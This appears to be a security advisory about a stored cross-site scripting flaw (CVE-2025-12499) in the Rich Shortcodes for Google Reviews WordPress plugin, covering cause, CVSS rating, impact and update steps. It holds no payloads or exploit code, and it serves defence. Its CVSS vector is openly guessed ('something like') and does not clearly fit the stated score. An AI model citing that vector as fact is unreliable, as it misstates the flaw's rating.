Overview
A critical Stored Cross-Site Scripting (XSS) vulnerability, identified as CVE-2025-12499, has been discovered in the Rich Shortcodes for Google Reviews plugin for WordPress. This vulnerability affects all versions up to and including 6.8. It allows unauthenticated attackers to inject malicious JavaScript code into pages through manipulated Google review content, potentially compromising user accounts and site integrity. While partially addressed in version 6.6.2, a complete fix was not implemented until later versions. It is crucial to update immediately to the latest available version.
Technical Details
The Rich Shortcodes for Google Reviews plugin is vulnerable to Stored XSS due to inadequate input sanitization and output escaping of Google review content displayed on the WordPress site. Specifically, the plugin fails to properly sanitize data retrieved from Google Reviews before rendering it on the webpage. An attacker can craft a malicious Google review containing JavaScript code. When this review is fetched and displayed by the plugin, the injected JavaScript will execute in the context of the user’s browser. Because the attacker doesn’t need to authenticate or have privileges on the vulnerable WordPress installation, this poses a huge risk if a crafted Google review exists.
CVSS Analysis
- CVE ID: CVE-2025-12499
- Severity: HIGH
- CVSS Score: 7.2
- CVSS Vector: (Calculation will vary depending on the final vector, but a typical vector would be something like CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
A CVSS score of 7.2 indicates a high severity vulnerability. The ‘AV:N’ (Network) attack vector means the vulnerability can be exploited remotely. The ‘AC:L’ (Low) attack complexity means exploitation is relatively easy. Although ‘UI:R’ (User Interaction Required) reduces the score somewhat, the impact, represented by ‘S:C’ (Scope Changed), indicates a change in the security context, making it potentially more dangerous than a simple XSS.
Possible Impact
Successful exploitation of this vulnerability can have severe consequences, including:
- Account Compromise: An attacker can steal user session cookies, allowing them to impersonate legitimate users and gain unauthorized access to their accounts, including administrator accounts.
- Malware Distribution: The injected script can redirect users to malicious websites or silently download malware onto their computers.
- Defacement: The attacker can modify the content of the website, potentially damaging its reputation.
- Phishing: The injected script can be used to display phishing forms, tricking users into revealing sensitive information like usernames, passwords, and credit card details.
Mitigation or Patch Steps
The most effective way to mitigate this vulnerability is to update the Rich Shortcodes for Google Reviews plugin to the latest available version. Ensure you are running a version greater than 6.8, where the vulnerability has been fully patched. To update:
- Log in to your WordPress admin dashboard.
- Navigate to “Plugins” -> “Installed Plugins.”
- Locate the “Rich Shortcodes for Google Reviews” plugin.
- If an update is available, click the “Update Now” link.
If you are unable to update the plugin immediately, consider temporarily disabling it until you can apply the update. Review and remove any suspicious Google Reviews that may have been already fetched to minimize the risk.